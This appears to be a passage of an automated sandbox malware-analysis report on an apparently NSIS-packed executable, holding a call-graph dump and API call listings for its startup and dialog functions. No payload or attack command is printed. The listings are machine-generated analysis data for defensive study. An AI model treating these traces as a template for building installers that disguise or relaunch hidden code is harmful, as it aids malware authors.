4568->4570 4569->4481 4569->4482 4570->4569 4571 10002496 GlobalFree 4570->4571 4571->4570 4573 10001272 2 API calls 4572->4573 4574 1000155e 4573->4574 4574->4475 4575->4486 4576->4492 4578 100015ad 4577->4578 4578->4514 4585 1000121b GlobalAlloc 4579->4585 4581 1000123b lstrcpynW 4581->4499 4582->4492 4583->4510 4584->4511 4585->4581 4587 100012c1 4586->4587 4588 1000122c 2 API calls 4587->4588 4589 100012df 4588->4589 4589->4518 4591 100025e7 VirtualAlloc 4590->4591 4592 1000263d 4590->4592 4591->4592 4592->4525 4593->4548 4595 100012ea 4594->4595 4596 1000130c 4594->4596 4595->4596 4597 100012f0 lstrcpyW 4595->4597 4596->4548 4597->4596 4598->4559 5340 10001058 5342 10001074 5340->5342 5341 100010dd 5342->5341 5343 10001092 5342->5343 5344 10001516 GlobalFree 5342->5344 5345 10001516 GlobalFree 5343->5345 5344->5343 5346 100010a2 5345->5346 5347 100010b2 5346->5347 5348 100010a9 GlobalSize 5346->5348 5349 100010b6 GlobalAlloc 5347->5349 5350 100010c7 5347->5350 5348->5347 5351 1000153d 3 API calls 5349->5351 5352 100010d2 GlobalFree 5350->5352 5351->5350 5352->5341 5353 401718 5354 402b3a 18 API calls 5353->5354 5355 40171f SearchPathW 5354->5355 5356 40173a 5355->5356 4838 40159b 4839 402b3a 18 API calls 4838->4839 4840 4015a2 SetFileAttributesW 4839->4840 4841 4015b4 4840->4841 5357 40659d 5361 406421 5357->5361 5358 406d8c 5359 4064a2 GlobalFree 5360 4064ab GlobalAlloc 5359->5360 5360->5358 5360->5361 5361->5358 5361->5359 5361->5360 5362 406522 GlobalAlloc 5361->5362 5363 406519 GlobalFree 5361->5363 5362->5358 5362->5361 5363->5362 5364 40149e 5365 4014ac PostQuitMessage 5364->5365 5366 40223e 5364->5366 5365->5366 5367 4021a0 5368 402b3a 18 API calls 5367->5368 5369 4021a6 5368->5369 5370 402b3a 18 API calls 5369->5370 5371 4021af 5370->5371 5372 402b3a 18 API calls 5371->5372 5373 4021b8 5372->5373 5374 40628b 2 API calls 5373->5374 5375 4021c1 5374->5375 5376 4021d2 lstrlenW lstrlenW 5375->5376 5380 4021c5 5375->5380 5378 4051f2 25 API calls 5376->5378 5377 4051f2 25 API calls 5381 4021cd 5377->5381 5379 402210 SHFileOperationW 5378->5379 5379->5380 5379->5381 5380->5377 5380->5381 5382 100010e1 5391 10001111 5382->5391 5383 100011d8 GlobalFree 5384 100012ba 2 API calls 5384->5391 5385 100011d3 5385->5383 5386 10001272 2 API calls 5389 100011c4 GlobalFree 5386->5389 5387 10001164 GlobalAlloc 5387->5391 5388 100011f8 GlobalFree 5388->5391 5389->5391 5390 100012e1 lstrcpyW 5390->5391 5391->5383 5391->5384 5391->5385 5391->5386 5391->5387 5391->5388 5391->5389 5391->5390 5392 401b22 5393 401b73 5392->5393 5396 401b2f 5392->5396 5394 401b78 5393->5394 5395 401b9d GlobalAlloc 5393->5395 5405 40223e 5394->5405 5413 405f48 lstrcpynW 5394->5413 5399 405f6a 18 API calls 5395->5399 5397 401bb8 5396->5397 5402 401b46 5396->5402 5398 405f6a 18 API calls 5397->5398 5397->5405 5401 402238 5398->5401 5399->5397 5406 405724 MessageBoxIndirectW 5401->5406 5411 405f48 lstrcpynW 5402->5411 5403 401b8a GlobalFree 5403->5405 5406->5405 5407 401b55 5412 405f48 lstrcpynW 5407->5412 5409 401b64 5409->5405 5414 405f48 lstrcpynW 5409->5414 5411->5407 5412->5409 5413->5403 5414->5405 4016 401924 4017 401926 4016->4017 4018 402b3a 18 API calls 4017->4018 4019 40192b 4018->4019 4022 4057d0 4019->4022 4061 405a9b 4022->4061 4025 4057f8 DeleteFileW 4027 401934 4025->4027 4026 40580f 4028 40592f 4026->4028 4075 405f48 lstrcpynW 4026->4075 4028->4027 4105 40628b FindFirstFileW 4028->4105 4030 405835 4031 405848 4030->4031 4032 40583b lstrcatW 4030->4032 4076 4059df lstrlenW 4031->4076 4034 40584e 4032->4034 4036 40585e lstrcatW 4034->4036 4038 405869 lstrlenW FindFirstFileW 4034->4038 4036->4038 4038->4028 4046 40588b 4038->4046 4039 405958 4108 405993 lstrlenW CharPrevW 4039->4108 4042 405912 FindNextFileW 4042->4046 4047 405928 FindClose 4042->4047 4043 405788 5 API calls 4045 40596a 4043->4045 4048 405984 4045->4048 4049 40596e 4045->4049 4046->4042 4055 4058d3 4046->4055 4080 405f48 lstrcpynW 4046->4080 4047->4028 4050 4051f2 25 API calls 4048->4050 4049->4027 4052 4051f2 25 API calls 4049->4052 4050->4027 4054 40597b 4052->4054 4053 4057d0 64 API calls 4053->4055 4057 405de2 40 API calls 4054->4057 4055->4042 4055->4053 4056 4051f2 25 API calls 4055->4056 4081 405788 4055->4081 4089 4051f2 4055->4089 4100 405de2 4055->4100 4056->4042 4059 405982 4057->4059 4059->4027 4111 405f48 lstrcpynW 4061->4111 4063 405aac 4112 405a3e CharNextW CharNextW 4063->4112 4066 4057f0 4066->4025 4066->4026 4067 4061dc 5 API calls 4070 405ac2 4067->4070 4068 405af3 lstrlenW 4069 405afe 4068->4069 4068->4070 4071 405993 3 API calls 4069->4071 4070->4066 4070->4068 4072 40628b 2 API calls 4070->4072 4074 4059df 2 API calls 4070->4074 4073 405b03 GetFileAttributesW 4071->4073 4072->4070 4073->4066 4074->4068 4075->4030 4077 4059ed 4076->4077 4078 4059f3 CharPrevW 4077->4078 4079 4059ff 4077->4079 4078->4077 4078->4079 4079->4034 4080->4046 4118 405b8f GetFileAttributesW 4081->4118 4084 4057a3 RemoveDirectoryW 4087 4057b1 4084->4087 4085 4057ab DeleteFileW 4085->4087 4086 4057b5 4086->4055 4087->4086 4088 4057c1 SetFileAttributesW 4087->4088 4088->4086 4090 40520d 4089->4090 4099 4052af 4089->4099 4091 405229 lstrlenW 4090->4091 4092 405f6a 18 API calls 4090->4092 4093 405252 4091->4093 4094 405237 lstrlenW 4091->4094 4092->4091 4095 405265 4093->4095 4096 405258 SetWindowTextW 4093->4096 4097 405249 lstrcatW 4094->4097 4094->4099 4098 40526b SendMessageW SendMessageW SendMessageW 4095->4098 4095->4099 4096->4095 4097->4093 4098->4099 4099->4055 4121 4062b2 GetModuleHandleA 4100->4121 4104 405e0a 4104->4055 4106 4062a1 FindClose 4105->4106 4107 405954 4105->4107 4106->4107 4107->4027 4107->4039 4109 40595e 4108->4109 4110 4059af lstrcatW 4108->4110 4109->4043 4110->4109 4111->4063 4113 405a5b 4112->4113 4116 405a6d 4112->4116 4115 405a68 CharNextW 4113->4115 4113->4116 4114 405a91 4114->4066 4114->4067 4115->4114 4116->4114 4117 4059c0 CharNextW 4116->4117 4117->4116 4119 405ba1 SetFileAttributesW 4118->4119 4120 405794 4118->4120 4119->4120 4120->4084 4120->4085 4120->4086 4122 4062d9 GetProcAddress 4121->4122 4123 4062ce LoadLibraryA 4121->4123 4124 405de9 4122->4124 4123->4122 4123->4124 4124->4104 4125 405c66 lstrcpyW 4124->4125 4126 405cb5 GetShortPathNameW 4125->4126 4127 405c8f 4125->4127 4129 405cca 4126->4129 4130 405ddc 4126->4130 4150 405bb4 GetFileAttributesW CreateFileW 4127->4150 4129->4130 4132 405cd2 wsprintfA 4129->4132 4130->4104 4131 405c99 CloseHandle GetShortPathNameW 4131->4130 4133 405cad 4131->4133 4134 405f6a 18 API calls 4132->4134 4133->4126 4133->4130 4135 405cfa 4134->4135 4151 405bb4 GetFileAttributesW CreateFileW 4135->4151 4137 405d07 4137->4130 4138 405d16 GetFileSize GlobalAlloc 4137->4138 4139 405dd5 CloseHandle 4138->4139 4140 405d38 4138->4140 4139->4130 4152 405c37 ReadFile 4140->4152 4145 405d57 lstrcpyA 4148 405d79 4145->4148 4146 405d6b 4147 405b19 4 API calls 4146->4147 4147->4148 4149 405db0 SetFilePointer WriteFile GlobalFree 4148->4149 4149->4139 4150->4131 4151->4137 4153 405c55 4152->4153 4153->4139 4154 405b19 lstrlenA 4153->4154 4155 405b5a lstrlenA 4154->4155 4156 405b62 4155->4156 4157 405b33 lstrcmpiA 4155->4157 4156->4145 4156->4146 4157->4156 4158 405b51 CharNextA 4157->4158 4158->4155 5415 402224 5416 40223e 5415->5416 5417 40222b 5415->5417 5418 405f6a 18 API calls 5417->5418 5419 402238 5418->5419 5420 405724 MessageBoxIndirectW 5419->5420 5420->5416 5428 402729 5429 402730 5428->5429 5430 4029c7 5428->5430 5431 402736 FindClose 5429->5431 5431->5430 5432 401cab 5433 402b1d 18 API calls 5432->5433 5434 401cb2 5433->5434 5435 402b1d 18 API calls 5434->5435 5436 401cba GetDlgItem 5435->5436 5437 4024e8 5436->5437 5438 4042ae lstrcpynW lstrlenW 5439 4016af 5440 402b3a 18 API calls 5439->5440 5441 4016b5 GetFullPathNameW 5440->5441 5442 4016cf 5441->5442 5448 4016f1 5441->5448 5444 40628b 2 API calls 5442->5444 5442->5448 5443 401706 GetShortPathNameW 5445 4029c7 5443->5445 5446 4016e1 5444->5446 5446->5448 5449 405f48 lstrcpynW 5446->5449 5448->5443 5448->5445 5449->5448 4195 405331 4196 405352 GetDlgItem GetDlgItem GetDlgItem 4195->4196 4197 4054dd 4195->4197 4241 4041cf SendMessageW 4196->4241 4199 4054e6 GetDlgItem CreateThread CloseHandle 4197->4199 4200 40550e 4197->4200 4199->4200 4244 4052c5 OleInitialize 4199->4244 4201 405539 4200->4201 4203 405525 ShowWindow ShowWindow 4200->4203 4204 40555e 4200->4204 4205 405545 4201->4205 4206 405599 4201->4206 4202 4053c3 4211 4053ca GetClientRect GetSystemMetrics SendMessageW SendMessageW 4202->4211 4243 4041cf SendMessageW 4203->4243 4210 404201 8 API calls 4204->4210 4208 405573 ShowWindow 4205->4208 4209 40554d 4205->4209 4206->4204 4214 4055a7 SendMessageW 4206->4214 4216 405593 4208->4216 4217 405585 4208->4217 4215 404173 SendMessageW 4209->4215 4221 40556c 4210->4221 4212 405439 4211->4212 4213 40541d SendMessageW SendMessageW 4211->4213 4218 40544c 4212->4218 4219 40543e SendMessageW 4212->4219 4213->4212 4220 4055c0 CreatePopupMenu 4214->4220 4214->4221 4215->4204 4223 404173 SendMessageW 4216->4223 4222 4051f2 25 API calls 4217->4222 4225 40419a 19 API calls 4218->4225 4219->4218 4224 405f6a 18 API calls 4220->4224 4222->4216 4223->4206 4226 4055d0 AppendMenuW 4224->4226 4227 40545c 4225->4227 4228 405600 TrackPopupMenu 4226->4228 4229 4055ed GetWindowRect 4226->4229 4230 405465 ShowWindow 4227->4230 4231 405499 GetDlgItem SendMessageW 4227->4231 4228->4221 4232 40561b 4228->4232 4229->4228 4233 405488 4230->4233 4234 40547b ShowWindow 4230->4234 4231->4221 4235 4054c0 SendMessageW SendMessageW 4231->4235 4236 405637 SendMessageW 4232->4236 4242 4041cf SendMessageW 4233->4242 4234->4233 4235->4221 4236->4236 4237 405654 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4236->4237 4239 405679 SendMessageW 4237->4239 4239->4239 4240 4056a2 GlobalUnlock SetClipboardData CloseClipboard 4239->4240 4240->4221 4241->4202 4242->4231 4243->4201 4245 4041e6 SendMessageW 4244->4245 4246 4052e8 4245->4246 4249 40530f 4246->4249 4250 401389 2 API calls 4246->4250 4247 4041e6 SendMessageW 4248 405321 OleUninitialize 4247->4248 4249->4247 4250->4246 5450 402331 5451 402337 5450->5451 5452 402b3a 18 API calls 5451->5452 5453 402349 5452->5453 5454 402b3a 18 API calls 5453->5454 5455 402353 RegCreateKeyExW 5454->5455 5456 40237d 5455->5456 5466 402793 5455->5466 5457 402398 5456->5457 5458 402b3a 18 API calls 5456->5458 5459 4023a4 5457->5459 5461 402b1d 18 API calls 5457->5461 5460 40238e lstrlenW 5458->5460 5462 4023bf RegSetValueExW 5459->5462 5464 403062 46 API calls 5459->5464 5460->5457 5461->5459 5463 4023d5 RegCloseKey 5462->5463 5463->5466 5464->5462 5467 404635 5468 404661 5467->5468 5469 404672 5467->5469 5528 405708 GetDlgItemTextW 5468->5528 5470 40467e GetDlgItem 5469->5470 5477 4046dd 5469->5477 5473 404692 5470->5473 5472 40466c 5475 4061dc 5 API calls 5472->5475 5476 4046a6 SetWindowTextW 5473->5476 5480 405a3e 4 API calls 5473->5480 5474 4047c1 5526 404955 5474->5526 5530 405708 GetDlgItemTextW 5474->5530 5475->5469 5481 40419a 19 API calls 5476->5481 5477->5474 5482 405f6a 18 API calls 5477->5482 5477->5526 5479 404201 8 API calls 5484 404969 5479->5484 5485 40469c 5480->5485 5486 4046c2 5481->5486 5487 404751 SHBrowseForFolderW 5482->5487 5483 4047f1 5488 405a9b 18 API calls 5483->5488 5485->5476 5492 405993 3 API calls 5485->5492 5489 40419a 19 API calls 5486->5489 5487->5474 5490 404769 CoTaskMemFree 5487->5490 5491 4047f7 5488->5491 5493 4046d0 5489->5493 5494 405993 3 API calls 5490->5494 5531 405f48 lstrcpynW 5491->5531 5492->5476 5529 4041cf SendMessageW 5493->5529 5496 404776 5494->5496 5499 4047ad SetDlgItemTextW 5496->5499 5503 405f6a 18 API calls 5496->5503 5498 4046d6 5501 4062b2 3 API calls 5498->5501 5499->5474 5500 40480e 5502 4062b2 3 API calls 5500->5502 5501->5477 5510 404816 5502->5510 5504 404795 lstrcmpiW 5503->5504 5504->5499 5506 4047a6 lstrcatW 5504->5506 5505 404855 5532 405f48 lstrcpynW 5505->5532 5506->5499 5508 40485c 5509 405a3e 4 API calls 5508->5509 5511 404862 GetDiskFreeSpaceW 5509->5511 5510->5505 5514 4059df 2 API calls 5510->5514 5515 4048a7 5510->5515 5513 404885 MulDiv 5511->5513 5511->5515 5513->5515 5514->5510 5516 4049d6 21 API calls 5515->5516 5525 404904 5515->5525 5517 4048f6 5516->5517 5520 404906 SetDlgItemTextW 5517->5520 5521 4048fb 5517->5521 5518 40140b 2 API calls 5519 404927 5518->5519 5533 4041bc KiUserCallbackDispatcher 5519->5533 5520->5525 5523 4049d6 21 API calls 5521->5523 5523->5525 5524 404943 5524->5526 5534 4045ca 5524->5534 5525->5518 5525->5519 5526->5479 5528->5472 5529->5498 5530->5483 5531->5500 5532->5508 5533->5524 5535 4045d8 5534->5535 5536 4045dd SendMessageW 5534->5536 5535->5536 5536->5526 5537 4014b8 5538 4014be 5537->5538 5539 401389 2 API calls 5538->5539 5540 4014c6 5539->5540 4608 4015b9 4609 402b3a 18 API calls 4608->4609 4610 4015c0 4609->4610 4611 405a3e 4 API calls 4610->4611 4618 4015c9 4611->4618 4612 401614 4614 401646 4612->4614 4615 401619 4612->4615 4613 4059c0 CharNextW 4616 4015d7 CreateDirectoryW 4613->4616 4620 401423 25 API calls 4614->4620 4617 401423 25 API calls 4615->4617 4616->4618 4619 4015ed GetLastError 4616->4619 4621 401620 4617->4621 4618->4612 4618->4613 4619->4618 4622 4015fa GetFileAttributesW 4619->4622 4625 40163e 4620->4625 4626 405f48 lstrcpynW 4621->4626 4622->4618 4624 40162d SetCurrentDirectoryW 4624->4625 4626->4624 5541 401939 5542 402b3a 18 API calls 5541->5542 5543 401940 lstrlenW 5542->5543 5544 4024e8 5543->5544 4842 40173f 4843 402b3a 18 API calls 4842->4843 4844 401746 4843->4844 4845 405be3 2 API calls 4844->4845 4846 40174d 4845->4846 4847 405be3 2 API calls 4846->4847 4847->4846 5552 10002a7f 5553 10002a97 5552->5553 5554 1000158f 2 API calls 5553->5554 5555 10002ab2 5554->5555

                                                          Executed Functions

                                                          Function 0040335A Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 383stringfilecomCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 40335a-4033f2 #17 SetErrorMode OleInitialize call 4062b2 SHGetFileInfoW call 405f48 GetCommandLineW call 405f48 GetModuleHandleW 7 4033f4-4033f6 0->7 8 4033fb-40340f call 4059c0 CharNextW 0->8 7->8 11 40350a-403510 8->11 12 403414-40341a 11->12 13 403516 11->13 15 403423-40342a 12->15 16 40341c-403421 12->16 14 40352a-403544 GetTempPathW call 403326 13->14 25 403546-403564 GetWindowsDirectoryW lstrcatW call 403326 14->25 26 40359c-4035b6 DeleteFileW call 402dbc 14->26 18 403432-403436 15->18 19 40342c-403431 15->19 16->15 16->16 20 4034f7-403506 call 4059c0 18->20 21 40343c-403442 18->21 19->18 20->11 40 403508-403509 20->40 23 403444-40344b 21->23 24 40345c-403495 21->24 28 403452 23->28 29 40344d-403450 23->29 30 4034b2-4034ec 24->30 31 403497-40349c 24->31 25->26 45 403566-403596 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403326 25->45 41 403667-403676 call 40382d OleUninitialize 26->41 42 4035bc-4035c2 26->42 28->24 29->24 29->28 37 4034f4-4034f6 30->37 38 4034ee-4034f2 30->38 31->30 35 40349e-4034a6 31->35 43 4034a8-4034ab 35->43 44 4034ad 35->44 37->20 38->37 46 403518-403525 call 405f48 38->46 40->11 58 403772-403778 41->58 59 40367c-40368c call 405724 ExitProcess 41->59 47 403657-40365e call 40391f 42->47 48 4035c8-4035d3 call 4059c0 42->48 43->30 43->44 44->30 45->26 45->41 46->14 57 403663 47->57 62 403621-40362b 48->62 63 4035d5-40360a 48->63 57->41 60 403815-40381d 58->60 61 40377e-40379b call 4062b2 * 3 58->61 70 403823-403827 ExitProcess 60->70 71 40381f 60->71 94 4037e5-4037f3 call 4062b2 61->94 95 40379d-40379f 61->95 67 403692-4036ac lstrcatW lstrcmpiW 62->67 68 40362d-40363b call 405a9b 62->68 66 40360c-403610 63->66 73 403612-403617 66->73 74 403619-40361d 66->74 67->41 76 4036ae-4036c4 CreateDirectoryW SetCurrentDirectoryW 67->76 68->41 84 40363d-403653 call 405f48 * 2 68->84 71->70 73->74 78 40361f 73->78 74->66 74->78 80 4036d1-4036fa call 405f48 76->80 81 4036c6-4036cc call 405f48 76->81 78->62 89 4036ff-40371b call 405f6a DeleteFileW 80->89 81->80 84->47 100 40375c-403764 89->100 101 40371d-40372d CopyFileW 89->101 105 403801-40380c ExitWindowsEx 94->105 106 4037f5-4037ff 94->106 95->94 99 4037a1-4037a3 95->99 99->94 103 4037a5-4037b7 GetCurrentProcess 99->103 100->89 107 403766-40376d call 405de2 100->107 101->100 104 40372f-40374f call 405de2 call 405f6a call 4056c3 101->104 103->94 116 4037b9-4037db 103->116 104->100 122 403751-403758 CloseHandle 104->122 105->60 110 40380e-403810 call 40140b 105->110 106->105 106->110 107->41 110->60 116->94 122->100
                                                          APIs
                                                          • #17.COMCTL32 ref: 00403379
                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                                          • OleInitialize.OLE32(00000000), ref: 0040338B
                                                            • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                            • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                            • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                          • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
                                                            • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                          • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\fTSt7dc60O.exe",00000000), ref: 004033DB
                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\fTSt7dc60O.exe",00000020), ref: 00403403
                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040353B
                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040354C
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403558
                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040356C
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403574
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403585
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040358D
                                                          • DeleteFileW.KERNELBASE(1033), ref: 004035A1
                                                          • OleUninitialize.OLE32(?), ref: 0040366C
                                                          • ExitProcess.KERNEL32 ref: 0040368C
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\fTSt7dc60O.exe",00000000,?), ref: 00403698
                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\fTSt7dc60O.exe",00000000,?), ref: 004036A4
                                                          • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004036B0
                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004036B7
                                                          • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\fTSt7dc60O.exe,0041FEA8,00000001), ref: 00403725
                                                          • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                          • GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 004037AC
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                          • ExitProcess.KERNEL32 ref: 00403827
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                          • String ID: "C:\Users\user\Desktop\fTSt7dc60O.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$C:\Users\user\Desktop$C:\Users\user\Desktop\fTSt7dc60O.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                          • API String ID: 4107622049-1708052718
                                                          • Opcode ID: 4d4429256b2e22e1563bae374a615e4d58d6fbe71fb0bbfbec444303671cea11
                                                          • Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
                                                          • Opcode Fuzzy Hash: 4d4429256b2e22e1563bae374a615e4d58d6fbe71fb0bbfbec444303671cea11
                                                          • Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E
                                                          Function 00405331 Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 282windowclipboardmemoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 123 405331-40534c 124 405352-40541b GetDlgItem * 3 call 4041cf call 404a8f GetClientRect GetSystemMetrics SendMessageW * 2 123->124 125 4054dd-4054e4 123->125 143 405439-40543c 124->143 144 40541d-405437 SendMessageW * 2 124->144 127 4054e6-405508 GetDlgItem CreateThread CloseHandle 125->127 128 40550e-40551b 125->128 127->128 129 405539-405543 128->129 130 40551d-405523 128->130 134 405545-40554b 129->134 135 405599-40559d 129->135 132 405525-405534 ShowWindow * 2 call 4041cf 130->132 133 40555e-405567 call 404201 130->133 132->129 147 40556c-405570 133->147 139 405573-405583 ShowWindow 134->139 140 40554d-405559 call 404173 134->140 135->133 137 40559f-4055a5 135->137 137->133 145 4055a7-4055ba SendMessageW 137->145 148 405593-405594 call 404173 139->148 149 405585-40558e call 4051f2 139->149 140->133 150 40544c-405463 call 40419a 143->150 151 40543e-40544a SendMessageW 143->151 144->143 152 4055c0-4055eb CreatePopupMenu call 405f6a AppendMenuW 145->152 153 4056bc-4056be 145->153 148->135 149->148 162 405465-405479 ShowWindow 150->162 163 405499-4054ba GetDlgItem SendMessageW 150->163 151->150 160 405600-405615 TrackPopupMenu 152->160 161 4055ed-4055fd GetWindowRect 152->161 153->147 160->153 164 40561b-405632 160->164 161->160 165 405488 162->165 166 40547b-405486 ShowWindow 162->166 163->153 167 4054c0-4054d8 SendMessageW * 2 163->167 168 405637-405652 SendMessageW 164->168 169 40548e-405494 call 4041cf 165->169 166->169 167->153 168->168 170 405654-405677 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 168->170 169->163 172 405679-4056a0 SendMessageW 170->172 172->172 173 4056a2-4056b6 GlobalUnlock SetClipboardData CloseClipboard 172->173 173->153
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 00405390
                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040539F
                                                          • GetClientRect.USER32(?,?), ref: 004053DC
                                                          • GetSystemMetrics.USER32(00000015), ref: 004053E4
                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
                                                          • ShowWindow.USER32(?,00000008), ref: 00405480
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004054A1
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
                                                          • GetDlgItem.USER32(?,000003F8), ref: 004053AE
                                                            • Part of subcall function 004041CF: SendMessageW.USER32(00000028,?,00000001,00403FFB), ref: 004041DD
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004054F3
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_000052C5,00000000), ref: 00405501
                                                          • CloseHandle.KERNELBASE(00000000), ref: 00405508
                                                          • ShowWindow.USER32(00000000), ref: 0040552C
                                                          • ShowWindow.USER32(?,00000008), ref: 00405531
                                                          • ShowWindow.USER32(00000008), ref: 0040557B
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
                                                          • CreatePopupMenu.USER32 ref: 004055C0
                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
                                                          • GetWindowRect.USER32(?,?), ref: 004055F4
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040560D
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                          • OpenClipboard.USER32(00000000), ref: 00405655
                                                          • EmptyClipboard.USER32 ref: 0040565B
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
                                                          • GlobalLock.KERNEL32(00000000), ref: 00405671
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004056A5
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
                                                          • CloseClipboard.USER32 ref: 004056B6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
